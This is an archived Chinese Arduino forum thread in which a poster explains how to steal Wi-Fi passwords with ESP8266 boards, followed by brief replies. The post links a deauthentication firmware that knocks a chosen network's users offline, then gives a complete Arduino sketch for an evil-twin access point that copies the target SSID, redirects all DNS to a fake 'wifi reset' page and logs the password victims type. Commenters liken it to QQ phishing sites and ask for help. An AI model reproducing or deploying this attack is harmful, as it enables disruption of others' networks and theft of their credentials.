利用8266获取任何wifi密码-Arduino中文社区 - Powered by Discuz! Archiver

dadv 发表于 2020-3-24 21:05

利用8266获取任何wifi密码

本帖最后由 dadv 于 2020-3-24 23:49 编辑

前言
1、使用esp8266wifi攻击+esp8266钓鱼
2、烧写攻击固件bin,
固件地址为`链接:https://pan.baidu.com/s/1WBGKKZ9HAtKcQV5VcnZN0w
提取码:4o8a
复制这段内容后打开百度网盘手机App,操作更方便哦`
地址为0x0000 ,烧写成功以后,稍等片刻,会看到一个wifi为zhangguanzhang的ssid,密码为ssid,连接上去,地址192.168.4.1,页面如下
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200324204752401.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzI3Mzg3MDE3,size_16,color_FFFFFF,t_70)
选择一个wifi信号比较强的,如图我选中了yanjie,然后点击边栏攻击
![点击开始](https://img-blog.csdnimg.cn/20200324205205146.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzI3Mzg3MDE3,size_16,color_FFFFFF,t_70)
点击开始,就可以,目标网络就会断线,客户连接不上。此时我们创建同SSID的wifi,使用arduino,代码如下
`#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266WiFi.h>

//调试定义
#define DebugBegin(baud_rate)    Serial.begin(baud_rate)
#define DebugPrintln(message)    Serial.println(message)
#define DebugPrint(message)    Serial.print(message)
#define DebugPrintF(...) Serial.printf( __VA_ARGS__ )

const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);

void web(){
   String html = "";
html +="<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>";
html += "<head ><title>wifi需要重置</title></head>";
html += " <body><script type='text/javascript'>";
html += "   var code = prompt('请输入wifi密码:');";
html += "window.location.href='app?a='+code;";
html += "</script>";
html += "</body>";
webServer.send(200, "text/html", html);



}
void paa(){
DebugPrintln("密码");
DebugPrintln(webServer.arg(0));


}

void setup() {
DebugBegin(115200);
WiFi.mode(WIFI_AP);
WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
WiFi.softAP("yanjie");//目标wifi修改成目标wifi


// 所有请求都映射到一个具体地址
dnsServer.start(DNS_PORT, "*", apIP);

// replay to all requests with same HTML
webServer.onNotFound([]() {
   
   
    web();
});
webServer.on("/app",paa);
webServer.begin();
//webServer.onNotFound(paa);
}

void loop() {
dnsServer.processNextRequest();
webServer.handleClient();

}`
烧写完以后,我们查看串口信息,波特率115200,正常用户就会尝试连接这个wifi,一旦连接上,就会跳转网页,请求输入WiFi密码
如有疑问,qq1652002925


n1001 发表于 2020-3-25 08:43

让我想起了QQ盗号的网站

跑龙套的保 发表于 2020-4-2 10:09

就这?

jiaoshou 发表于 2020-4-2 23:53

给你点赞大写的牛逼

Jinbauncle 发表于 2020-4-21 14:35

这个应该叫(WIFI)诱骗器,和楼上说的一样 ,就和以前的qq钓鱼网站一样和哈哈哈哈

keliyuan 发表于 2020-4-25 23:40

请教你这是用2块8266板子,1个烧录攻击,一个烧录钓鱼吗?
用Arduino IDE那个代码怎么编译不成功?更详细讲一下,第二个钓鱼下载过程吗?

mr7 发表于 2020-4-26 19:07

只限研究吧!

dadv 发表于 2020-5-9 23:27

keliyuan 发表于 2020-4-25 23:40
请教你这是用2块8266板子,1个烧录攻击,一个烧录钓鱼吗?
用Arduino IDE那个代码怎么编译不成功?更详细 ...

都这么简单了

cluse 发表于 2020-5-11 07:57

呵呵,10年前我就用过linux下读取wep加密wifi的密码,也不敢像你这样吹啊。
现在的路由器,哪这么容易崩啊。

dadv 发表于 2020-5-12 21:02

cluse 发表于 2020-5-11 07:57
呵呵,10年前我就用过linux下读取wep加密wifi的密码,也不敢像你这样吹啊。
现在的路由器,哪这么容易崩啊 ...

你还是太高估了,作为安全研究者,是做过研究的
页: [1] 2
查看完整版本: 利用8266获取任何wifi密码